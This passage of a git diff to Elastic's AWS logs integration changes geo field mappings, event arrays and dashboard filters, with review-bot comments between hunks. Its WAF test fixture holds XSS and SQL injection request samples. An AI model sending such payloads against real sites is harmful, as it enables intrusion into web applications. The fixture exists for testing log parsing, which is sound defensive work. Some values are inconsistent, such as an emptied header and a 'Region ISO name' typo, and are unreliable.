15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, "ip": "89.160.20.156", "user": { "id": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9" 
@@ -368,7 +416,7 @@ "duration": 4000000, "id": "706992E2F3CC3C3D", "kind": "event", - "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 706992E2F3CC3C3D REST.GET.LOCATION - \"GET /test-s3-ks/?location\u0026aws-account=627959692251 HTTP/1.1\" 200 - 142 - 4 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - cIN12KTrJwx+uTBZD+opZUPE4iGypi8oG/oXGPzFk9CMuHQGuEpmAeNELdtYKDxf2TDor25Nikg= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", + "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 706992E2F3CC3C3D REST.GET.LOCATION - \"GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1\" 200 - 142 - 4 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - cIN12KTrJwx+uTBZD+opZUPE4iGypi8oG/oXGPzFk9CMuHQGuEpmAeNELdtYKDxf2TDor25Nikg= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "outcome": "success", "type": [ "access" @@ -415,9 +463,9 @@ "version_protocol": "tls" }, "url": { - "original": "/test-s3-ks/?location\u0026aws-account=627959692251", + "original": "/test-s3-ks/?location&aws-account=627959692251", "path": "/test-s3-ks/", - "query": "location\u0026aws-account=627959692251" + "query": "location&aws-account=627959692251" }, "user_agent": { "device": { 
@@ -456,6 +504,18 @@ }, "client": { "address": "89.160.20.156", + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, "ip": "89.160.20.156", "user": { "id": "arn:aws:iam::123456:user/test@elastic.co" @@ -536,6 +596,18 @@ }, "client": { "address": "89.160.20.156", + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, "ip": "89.160.20.156", "user": { "id": "arn:aws:iam::123456:user/test@elastic.co" diff --git a/packages/aws/data_stream/s3access/elasticsearch/ingest_pipeline/default.yml b/packages/aws/data_stream/s3access/elasticsearch/ingest_pipeline/default.yml index 4cc5fd2a9d92..5dfba312d613 100644 --- a/packages/aws/data_stream/s3access/elasticsearch/ingest_pipeline/default.yml +++ b/packages/aws/data_stream/s3access/elasticsearch/ingest_pipeline/default.yml @@ -103,8 +103,12 @@ processors: ignore_empty_value: true - geoip: field: aws.s3access.remote_ip - target_field: geo + target_field: client.geo if: ctx?.aws?.s3access?.remote_ip != null + - set: + field: geo + copy_from: client.geo + ignore_empty_value: true - set: field: client.user.id value: '{{aws.s3access.requester}}' diff --git a/packages/aws/data_stream/s3access/fields/ecs.yml b/packages/aws/data_stream/s3access/fields/ecs.yml index 2dc9fb59821d..09947a2c1a86 100644 --- a/packages/aws/data_stream/s3access/fields/ecs.yml +++ b/packages/aws/data_stream/s3access/fields/ecs.yml @@ -4,8 +4,6 @@ name: client.ip - external: ecs name: client.user.id -- external: ecs - name: cloud.provider - external: ecs name: ecs.version - external: ecs 
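Review bot: In the s3access pipeline, the new `set` processor that copies `client.geo` back into `geo` has no comment or `description`, so a later cleanup could remove it without realising it keeps the old field location populated (presumably for existing dashboards and queries; the commit does not say). I would add `description: Keep legacy top-level geo for backward compatibility; client.geo is the ECS location` to that processor. The sample_event.json change in this commit also moves `geo` under `client` without keeping a top-level copy, so the sample no longer shows everything the pipeline emits. The `processors` list starts and ends outside this hunk.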
@@ -23,21 +21,21 @@ - external: ecs name: event.outcome - external: ecs - name: geo.city_name + name: client.geo.city_name - external: ecs - name: geo.continent_name + name: client.geo.continent_name - external: ecs - name: geo.country_iso_code + name: client.geo.country_iso_code - external: ecs - name: geo.country_name + name: client.geo.country_name - description: Longitude and latitude. level: core - name: geo.location + name: client.geo.location type: geo_point - external: ecs - name: geo.region_iso_code + name: client.geo.region_iso_code - external: ecs - name: geo.region_name + name: client.geo.region_name - external: ecs name: http.request.method - external: ecs diff --git a/packages/aws/data_stream/s3access/fields/fields.yml b/packages/aws/data_stream/s3access/fields/fields.yml index e4b8c951d405..834aeabd15ed 100644 --- a/packages/aws/data_stream/s3access/fields/fields.yml +++ b/packages/aws/data_stream/s3access/fields/fields.yml @@ -93,3 +93,24 @@ type: keyword description: | The Transport Layer Security (TLS) version negotiated by the client. +- name: geo.city_name + type: keyword + description: City name. +- name: geo.continent_name + type: keyword + description: Name of the continent. +- name: geo.country_iso_code + type: keyword + description: Country ISO code. +- name: geo.country_name + type: keyword + description: Country name. +- description: Longitude and latitude. + name: geo.location + type: geo_point +- name: geo.region_iso_code + type: keyword + description: Region ISO name. +- name: geo.region_name + type: keyword + description: Region name. \ No newline at end of file diff --git a/packages/aws/data_stream/s3access/sample_event.json b/packages/aws/data_stream/s3access/sample_event.json index 313394b43f7c..72597224fb3e 100644 --- a/packages/aws/data_stream/s3access/sample_event.json +++ b/packages/aws/data_stream/s3access/sample_event.json 
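Review bot: The `geo.*` entries added to s3access/fields/fields.yml end the file without a trailing newline (`\ No newline at end of file` after `description: Region name.`), the same defect this commit fixes in the other field files. The description for `geo.region_iso_code` reads `Region ISO name.` where `Region ISO code.` is meant. Nothing marks these entries as the legacy copy of `client.geo.*` that the pipeline now writes; a leading comment such as `# Legacy top-level geo fields kept for backward compatibility; prefer client.geo.*` would make that explicit.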
@@ -13,18 +13,6 @@ "tags": [ "preserve_original_event" ], - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.4728, - "lat": 39.0481 - } - }, "cloud": { "provider": "aws" }, @@ -55,6 +43,18 @@ "user": { "id": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9" }, + "geo": { + "continent_name": "North America", + "region_iso_code": "US-VA", + "city_name": "Ashburn", + "country_iso_code": "US", + "country_name": "United States", + "region_name": "Virginia", + "location": { + "lon": -77.4728, + "lat": 39.0481 + } + }, "address": "72.21.217.31", "ip": "72.21.217.31" }, diff --git a/packages/aws/data_stream/sqs/fields/ecs.yml b/packages/aws/data_stream/sqs/fields/ecs.yml index 724270921d7d..17aba4ca24ec 100644 --- a/packages/aws/data_stream/sqs/fields/ecs.yml +++ b/packages/aws/data_stream/sqs/fields/ecs.yml @@ -64,4 +64,4 @@ name: container.name - name: agent.id external: ecs - dimension: true \ No newline at end of file + dimension: true diff --git a/packages/aws/data_stream/usage/fields/ecs.yml b/packages/aws/data_stream/usage/fields/ecs.yml index f31088c62a12..6884baffe92c 100644 --- a/packages/aws/data_stream/usage/fields/ecs.yml +++ b/packages/aws/data_stream/usage/fields/ecs.yml @@ -64,4 +64,4 @@ name: container.name - name: agent.id external: ecs - dimension: true \ No newline at end of file + dimension: true diff --git a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log-expected.json b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log-expected.json index a51bb4e14e84..73d5f783e99f 100644 --- a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log-expected.json 
+++ b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log-expected.json @@ -35,13 +35,17 @@ "version": "8.0.0" }, "event": { - "category": "network", + "category": [ + "network" + ], "end": "2016-10-31T11:37:00.000Z", "kind": "event", "original": "2 123456789010 eni-1235b8ca123456789 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 34892 22 6 54 8855 1477913708 1477913820 ACCEPT OK", "outcome": "success", "start": "2016-10-31T11:35:08.000Z", - "type": "connection" + "type": [ + "connection" + ] }, "network": { "bytes": 8855, @@ -97,12 +101,16 @@ "version": "8.0.0" }, "event": { - "category": "network", + "category": [ + "network" + ], "end": "2015-05-10T18:02:14.000Z", "kind": "event", "original": "2 123456789010 eni-1235b8ca123456789 - - - - - - - 1431280876 1431280934 - NODATA", "start": "2015-05-10T18:01:16.000Z", - "type": "connection" + "type": [ + "connection" + ] }, "tags": [ "preserve_original_event" @@ -128,12 +136,16 @@ "version": "8.0.0" }, "event": { - "category": "network", + "category": [ + "network" + ], "end": "2015-05-10T18:02:14.000Z", "kind": "event", "original": "2 123456789010 eni-89.160.20.1561aaaaaaaaa - - - - - - - 1431280876 1431280934 - SKIPDATA", "start": "2015-05-10T18:01:16.000Z", - "type": "connection" + "type": [ + "connection" + ] }, "tags": [ "preserve_original_event" @@ -183,13 +195,17 @@ "version": "8.0.0" }, "event": { - "category": "network", + "category": [ + "network" + ], "end": "2014-12-14T04:07:50.000Z", "kind": "event", "original": "2 123456789010 eni-1235b8ca123456789 89.160.20.156 89.160.20.156 20641 22 6 20 4249 1418530010 1418530070 ACCEPT OK", "outcome": "success", "start": "2014-12-14T04:06:50.000Z", - "type": "connection" + "type": [ + "connection" + ] }, "network": { "bytes": 4249, 
@@ -278,13 +294,17 @@ "version": "8.0.0" }, "event": { - "category": "network", + "category": [ + "network" + ], "end": "2014-12-14T04:07:50.000Z", "kind": "event", "original": "2 123456789010 eni-1235b8ca123456789 89.160.20.156 89.160.20.156 49761 3389 6 20 4249 1418530010 1418530070 REJECT OK", "outcome": "failure", "start": "2014-12-14T04:06:50.000Z", - "type": "connection" + "type": [ + "connection" + ] }, "network": { "bytes": 4249, @@ -355,13 +375,17 @@ "version": "8.0.0" }, "event": { - "category": "network", + "category": [ + "network" + ], "end": "2015-05-29T16:32:22.000Z", "kind": "event", "original": "2 123456789010 eni-1235b8ca123456789 89.160.20.156 172.31.16.139 0 0 1 4 336 1432917027 1432917142 ACCEPT OK", "outcome": "success", "start": "2015-05-29T16:30:27.000Z", - "type": "connection" + "type": [ + "connection" + ] }, "network": { "bytes": 336, @@ -450,13 +474,17 @@ "version": "8.0.0" }, "event": { - "category": "network", + "category": [ + "network" + ], "end": "2015-05-29T16:32:22.000Z", "kind": "event", "original": "2 123456789010 eni-1235b8ca123456789 172.31.16.139 89.160.20.156 0 0 1 4 336 1432917094 1432917142 REJECT OK", "outcome": "failure", "start": "2015-05-29T16:31:34.000Z", - "type": "connection" + "type": [ + "connection" + ] }, "network": { "bytes": 336, diff --git a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log-expected.json b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log-expected.json index 5b7f5c755a91..5b47f22a27f5 100644 --- a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log-expected.json +++ b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-tcp-flag-sequence.log-expected.json 
@@ -39,13 +39,17 @@ "version": "8.0.0" }, "event": { - "category": "network", + "category": [ + "network" + ], "end": "2019-08-26T19:48:53.000Z", "kind": "event", "original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 89.160.20.156 10.0.0.62 43416 5001 89.160.20.156 10.0.0.62 6 568 8 1566848875 1566848933 ACCEPT 2 OK", "outcome": "success", "start": "2019-08-26T19:47:55.000Z", - "type": "connection" + "type": [ + "connection" + ] }, "network": { "bytes": 568, @@ -116,12 +120,16 @@ "version": "8.0.0" }, "event": { - "category": "network", + "category": [ + "network" + ], "end": "2019-08-26T19:48:53.000Z", "kind": "event", "original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 - - - - - - - - - - 1566848875 1566848933 - - SKIPDATA", "start": "2019-08-26T19:47:55.000Z", - "type": "connection" + "type": [ + "connection" + ] }, "tags": [ "preserve_original_event" @@ -153,12 +161,16 @@ "version": "8.0.0" }, "event": { - "category": "network", + "category": [ + "network" + ], "end": "2019-08-26T19:48:53.000Z", "kind": "event", "original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 - - - - - - - - - - 1566848875 1566848933 - - NODATA", "start": "2019-08-26T19:47:55.000Z", - "type": "connection" + "type": [ + "connection" + ] }, "tags": [ "preserve_original_event" diff --git a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-v5-all-fields.log-expected.json b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-v5-all-fields.log-expected.json index 2abc453081ee..aab712c0ee93 100644 --- a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-v5-all-fields.log-expected.json +++ b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-v5-all-fields.log-expected.json 
@@ -45,13 +45,17 @@ "version": "8.0.0" }, "event": { - "category": "network", + "category": [ + "network" + ], "end": "2021-12-20T11:38:17.000Z", "kind": "event", "original": "5 64111117617 eni-069xxxxxb7a490 89.160.20.156 10.200.0.0 50041 33004 17 52 1 164000066 1640000297 REJECT OK vpc-09676f97xxxxxb8a7 subnet-02d645xxxxxxxdbc0 i-0axxxxxx1ad77 1 IPv4 89.160.20.156 10.200.0.80 us-east-1 use1-az5 - - AMAZON CLOUDFRONT ingress 1", "outcome": "failure", "start": "1975-03-14T03:34:26.000Z", - "type": "connection" + "type": [ + "connection" + ] }, "network": { "bytes": 1, diff --git a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-with-message-field.log-expected.json b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-with-message-field.log-expected.json index f90c95bec95b..bc9b1592f331 100644 --- a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-with-message-field.log-expected.json +++ b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-with-message-field.log-expected.json @@ -20,12 +20,16 @@ "version": "8.0.0" }, "event": { - "category": "network", + "category": [ + "network" + ], "end": "2022-12-14T14:55:28.000Z", "kind": "event", "original": "2 428961148399 eni-0e0bf7be352692297 - - - - - - - 1671029698 1671029728 - NODATA", "start": "2022-12-14T14:54:58.000Z", - "type": "connection" + "type": [ + "connection" + ] }, "tags": [ "preserve_original_event" diff --git a/packages/aws/data_stream/vpcflow/elasticsearch/ingest_pipeline/default.yml b/packages/aws/data_stream/vpcflow/elasticsearch/ingest_pipeline/default.yml index 4f04b099e8ee..d607c64eb3bf 100644 --- a/packages/aws/data_stream/vpcflow/elasticsearch/ingest_pipeline/default.yml +++ b/packages/aws/data_stream/vpcflow/elasticsearch/ingest_pipeline/default.yml 
@@ -20,10 +20,10 @@ processors:
 description: 'The `message` field is no longer required if the document has an `event.original` field.'
 - set:
 field: event.type
- value: connection
+ value: [connection]
 - set:
 field: event.category
- value: network
+ value: [network]
 - drop:
 if: 'ctx.event?.original.startsWith("version") || ctx.event?.original.startsWith("instance-id")'
 - dissect:
diff --git a/packages/aws/data_stream/vpcflow/fields/ecs.yml b/packages/aws/data_stream/vpcflow/fields/ecs.yml
index a4ce35d1fa59..378811fd396c 100644
--- a/packages/aws/data_stream/vpcflow/fields/ecs.yml
+++ b/packages/aws/data_stream/vpcflow/fields/ecs.yml
@@ -78,8 +78,6 @@
 external: ecs
 - name: source.as.organization.name
 external: ecs
-- name: source.as.organization.name
- external: ecs
 - name: source.bytes
 external: ecs
 - name: source.geo.city_name
diff --git a/packages/aws/data_stream/vpcflow/fields/fields.yml b/packages/aws/data_stream/vpcflow/fields/fields.yml
index 0d85135f5d3b..6d3d8ed255b8 100644
--- a/packages/aws/data_stream/vpcflow/fields/fields.yml
+++ b/packages/aws/data_stream/vpcflow/fields/fields.yml
@@ -93,4 +93,3 @@
 type: keyword
 description: |
 The ID of the sublocation that contains the network interface for which traffic is recorded. If the traffic is not from a sublocation, the field is removed.
-
diff --git a/packages/aws/data_stream/vpcflow/sample_event.json b/packages/aws/data_stream/vpcflow/sample_event.json
index 735058bd9352..cfd45f10dea1 100644
--- a/packages/aws/data_stream/vpcflow/sample_event.json
+++ b/packages/aws/data_stream/vpcflow/sample_event.json
@@ -49,8 +49,12 @@
 "kind": "event",
 "start": "2016-10-31T11:35:08.000Z",
 "end": "2016-10-31T11:37:00.000Z",
- "type": "connection",
- "category": "network",
+ "type": [
+ "connection"
+ ],
+ "category": [
+ "network"
+ ],
 "outcome": "success"
 },
 "aws": {
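Review bot: In the `default.yml` hunk, the two `set` processors now write `event.type` and `event.category` as one-element lists, so any later condition or script in this pipeline that compares either field to a string (a check of the form `ctx.event.type == 'connection'`) would stop matching. The rest of the pipeline lies outside this hunk, so that has to be checked there. A comment above the first processor would record why the value is a list, for example `# ECS defines event.type and event.category as arrays`.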
diff --git a/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log-expected.json b/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log-expected.json
index b6e03615ed73..7d4ef0c9d792 100644
--- a/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log-expected.json
+++ b/packages/aws/data_stream/waf/_dev/test/pipeline/test-waf.log-expected.json
@@ -214,7 +214,7 @@
 "Host": "localhost:1989",
 "User-Agent": "curl/7.61.1",
 "bar": "10 AND 1=1",
- "xssfoo": "\u003cframeset onload=alert(1)\u003e"
+ "xssfoo": ""
 }
 },
 "rule_group_list": [
@@ -248,7 +248,7 @@
 "conditionType": "XSS",
 "location": "HEADER",
 "matchedData": [
- "\u003c",
+ "<",
 "frameset"
 ]
 }
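Review bot: The new expected value `"xssfoo": ""` disagrees with the rule evidence next to it: `matchedData` still lists `<` and `frameset`, and the removed line carried the full header value. The same empty `value` for `xssfoo` appears inside the new `event.original` string in the `@@ -272,7 +272,7 @@` hunk. The `"\u003c"` to `"<"` change suggests only the escaping was meant to differ, so the header value should still be present on the new side; it may have been lost when this page was rendered, which is worth confirming against the file itself. If the fixture really is empty, the test no longer asserts that the pipeline preserves the blocked request header that a WAF `BLOCK` event is triaged from.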
@@ -272,7 +272,7 @@ "action": "BLOCK", "category": "web", "kind": "event", - "original": "{\"timestamp\":1592361810888,\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:us-east-1:123456789012:global/webacl/hello-world/5933d6d9-9dde-js82-v8aw-9ck28nv9\",\"terminatingRuleId\":\"RG-Reference\",\"terminatingRuleType\":\"GROUP\",\"action\":\"BLOCK\",\"terminatingRuleMatchDetails\":[{\"conditionType\":\"XSS\",\"location\":\"HEADER\",\"matchedData\":[\"\u003c\",\"frameset\"]}],\"httpSourceName\":\"-\",\"httpSourceId\":\"-\",\"ruleGroupList\":[{\"ruleGroupId\":\"arn:aws:wafv2:us-east-1:123456789012:global/rulegroup/hello-world/c05lb698-1f11-4m41-aef4-99a506d53f4b\",\"terminatingRule\":{\"ruleId\":\"RuleA-XSS\",\"action\":\"BLOCK\",\"ruleMatchDetails\":null},\"nonTerminatingMatchingRules\":[{\"ruleId\":\"RuleB-SQLi\",\"action\":\"COUNT\",\"ruleMatchDetails\":[{\"conditionType\":\"SQL_INJECTION\",\"location\":\"HEADER\",\"matchedData\":[\"10\",\"and\",\"1\"]}]}],\"excludedRules\":null}],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[],\"httpRequest\":{\"clientIp\":\"89.160.20.156\",\"country\":\"US\",\"headers\":[{\"name\":\"Host\",\"value\":\"localhost:1989\"},{\"name\":\"User-Agent\",\"value\":\"curl/7.61.1\"},{\"name\":\"Accept\",\"value\":\"*/*\"},{\"name\":\"xssfoo\",\"value\":\"\u003cframeset onload=alert(1)\u003e\"},{\"name\":\"bar\",\"value\":\"10 AND 1=1\"}],\"uri\":\"/foo\",\"args\":\"\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"GET\",\"requestId\":\"rid\"},\"labels\":[{\"name\":\"value\"}]}", + "original": 
"{\"timestamp\":1592361810888,\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:us-east-1:123456789012:global/webacl/hello-world/5933d6d9-9dde-js82-v8aw-9ck28nv9\",\"terminatingRuleId\":\"RG-Reference\",\"terminatingRuleType\":\"GROUP\",\"action\":\"BLOCK\",\"terminatingRuleMatchDetails\":[{\"conditionType\":\"XSS\",\"location\":\"HEADER\",\"matchedData\":[\"<\",\"frameset\"]}],\"httpSourceName\":\"-\",\"httpSourceId\":\"-\",\"ruleGroupList\":[{\"ruleGroupId\":\"arn:aws:wafv2:us-east-1:123456789012:global/rulegroup/hello-world/c05lb698-1f11-4m41-aef4-99a506d53f4b\",\"terminatingRule\":{\"ruleId\":\"RuleA-XSS\",\"action\":\"BLOCK\",\"ruleMatchDetails\":null},\"nonTerminatingMatchingRules\":[{\"ruleId\":\"RuleB-SQLi\",\"action\":\"COUNT\",\"ruleMatchDetails\":[{\"conditionType\":\"SQL_INJECTION\",\"location\":\"HEADER\",\"matchedData\":[\"10\",\"and\",\"1\"]}]}],\"excludedRules\":null}],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[],\"httpRequest\":{\"clientIp\":\"89.160.20.156\",\"country\":\"US\",\"headers\":[{\"name\":\"Host\",\"value\":\"localhost:1989\"},{\"name\":\"User-Agent\",\"value\":\"curl/7.61.1\"},{\"name\":\"Accept\",\"value\":\"*/*\"},{\"name\":\"xssfoo\",\"value\":\"\"},{\"name\":\"bar\",\"value\":\"10 AND 1=1\"}],\"uri\":\"/foo\",\"args\":\"\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"GET\",\"requestId\":\"rid\"},\"labels\":[{\"name\":\"value\"}]}", "type": [ "access", "denied" diff --git a/packages/aws/data_stream/waf/fields/ecs.yml b/packages/aws/data_stream/waf/fields/ecs.yml index 03d036b8a4ba..19fc554bf597 100644 --- a/packages/aws/data_stream/waf/fields/ecs.yml +++ b/packages/aws/data_stream/waf/fields/ecs.yml @@ -2,8 +2,6 @@ name: source.address - external: ecs name: source.ip -- external: ecs - name: cloud.provider - external: ecs name: ecs.version - external: ecs diff --git a/packages/aws/docs/elb.md b/packages/aws/docs/elb.md index a998b929e91b..5a1892769109 100644 --- a/packages/aws/docs/elb.md 
+++ b/packages/aws/docs/elb.md @@ -232,7 +232,9 @@ An example event for `elb` looks as following: "version": "8.0.0" }, "event": { - "category": "web", + "category": [ + "web" + ], "end": "2018-07-02T22:23:00.186Z", "kind": "event", "original": "http 2018-07-02T22:23:00.186641Z app/my-loadbalancer/50dc6c495c0c9188 192.168.131.39:2817 10.0.0.1:80 0.000 0.001 0.000 200 200 34 366 \"GET http://www.example.com:80/ HTTP/1.1\" \"curl/7.46.0\" - - arn:aws:elasticloadbalancing:us-east-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067 \"Root=1-58337262-36d228ad5d99923122bbe354\" \"-\" \"-\" 0 2018-07-02T22:22:48.364000Z \"forward,redirect\" \"-\" \"-\" \"10.0.0.1:80\" \"200\" \"-\" \"-\"", diff --git a/packages/aws/docs/route53.md b/packages/aws/docs/route53.md index 2564ef0aa87c..17aee59b98a0 100644 --- a/packages/aws/docs/route53.md +++ b/packages/aws/docs/route53.md @@ -306,7 +306,7 @@ An example event for `route53_resolver` looks as following: "data_stream": { "namespace": "default", "type": "logs", - "dataset": "aws.route53_public_logs" + "dataset": "aws.route53_resolver_logs" }, "dns": { "question": { diff --git a/packages/aws/docs/s3.md b/packages/aws/docs/s3.md index a0284ccac0b8..99eaeb87ba3e 100644 --- a/packages/aws/docs/s3.md +++ b/packages/aws/docs/s3.md 
@@ -80,6 +80,13 @@ to learn about customer base and understand Amazon S3 bill. | aws.s3access.user_agent | The value of the HTTP User-Agent header. | keyword | | aws.s3access.version_id | The version ID in the request, or "-" if the operation does not take a versionId parameter. | keyword | | client.address | Some event client addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword | +| client.geo.city_name | City name. | keyword | +| client.geo.continent_name | Name of the continent. | keyword | +| client.geo.country_iso_code | Country ISO code. | keyword | +| client.geo.country_name | Country name. | keyword | +| client.geo.location | Longitude and latitude. | geo_point | +| client.geo.region_iso_code | Region ISO code. | keyword | +| client.geo.region_name | Region name. | keyword | | client.ip | IP address of the client (IPv4 or IPv6). | ip | | client.user.id | Unique identifier of the user. | keyword | | cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | @@ -114,7 +121,7 @@ to learn about customer base and understand Amazon S3 bill. | geo.country_iso_code | Country ISO code. | keyword | | geo.country_name | Country name. | keyword | | geo.location | Longitude and latitude. | geo_point | -| geo.region_iso_code | Region ISO code. | keyword | +| geo.region_iso_code | Region ISO name. | keyword | | geo.region_name | Region name. | keyword | | host.architecture | Operating system architecture. | keyword | | host.containerized | If the host is a container. | boolean | 
@@ -181,18 +188,6 @@ An example event for `s3access` looks as following: "tags": [ "preserve_original_event" ], - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.4728, - "lat": 39.0481 - } - }, "cloud": { "provider": "aws" }, @@ -223,6 +218,18 @@ An example event for `s3access` looks as following: "user": { "id": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9" }, + "geo": { + "continent_name": "North America", + "region_iso_code": "US-VA", + "city_name": "Ashburn", + "country_iso_code": "US", + "country_name": "United States", + "region_name": "Virginia", + "location": { + "lon": -77.4728, + "lat": 39.0481 + } + }, "address": "72.21.217.31", "ip": "72.21.217.31" }, diff --git a/packages/aws/docs/vpcflow.md b/packages/aws/docs/vpcflow.md index 128ed7913d0d..2cdcf70f6381 100644 --- a/packages/aws/docs/vpcflow.md +++ b/packages/aws/docs/vpcflow.md @@ -244,8 +244,12 @@ An example event for `vpcflow` looks as following: "kind": "event", "start": "2016-10-31T11:35:08.000Z", "end": "2016-10-31T11:37:00.000Z", - "type": "connection", - "category": "network", + "type": [ + "connection" + ], + "category": [ + "network" + ], "outcome": "success" }, "aws": { diff --git a/packages/aws/kibana/dashboard/aws-15503340-4488-11ea-ad63-791a5dc86f10.json b/packages/aws/kibana/dashboard/aws-15503340-4488-11ea-ad63-791a5dc86f10.json index f87decc844e0..8212b0238e69 100644 --- a/packages/aws/kibana/dashboard/aws-15503340-4488-11ea-ad63-791a5dc86f10.json +++ b/packages/aws/kibana/dashboard/aws-15503340-4488-11ea-ad63-791a5dc86f10.json 
@@ -9,7 +9,29 @@ "description": "Logs AWS VPC Flow Log Overview Dashboard", "kibanaSavedObjectMeta": { "searchSourceJSON": { - "filter": [], + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "aws.vpcflow" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "aws.vpcflow" + } + } + } + ], "query": { "language": "kuery", "query": "" diff --git a/packages/aws/kibana/dashboard/aws-3af47420-3e7b-11ea-bb0a-69c3ca1d410f.json b/packages/aws/kibana/dashboard/aws-3af47420-3e7b-11ea-bb0a-69c3ca1d410f.json index 58e89e9f8270..3521b6f76fc4 100644 --- a/packages/aws/kibana/dashboard/aws-3af47420-3e7b-11ea-bb0a-69c3ca1d410f.json +++ b/packages/aws/kibana/dashboard/aws-3af47420-3e7b-11ea-bb0a-69c3ca1d410f.json @@ -3,7 +3,29 @@ "description": "Logs AWS ELB Access Log Overview Dashboard", "kibanaSavedObjectMeta": { "searchSourceJSON": { - "filter": [], + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "aws.elb_logs" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "aws.elb_logs" + } + } + } + ], "query": { "language": "kuery", "query": "" 
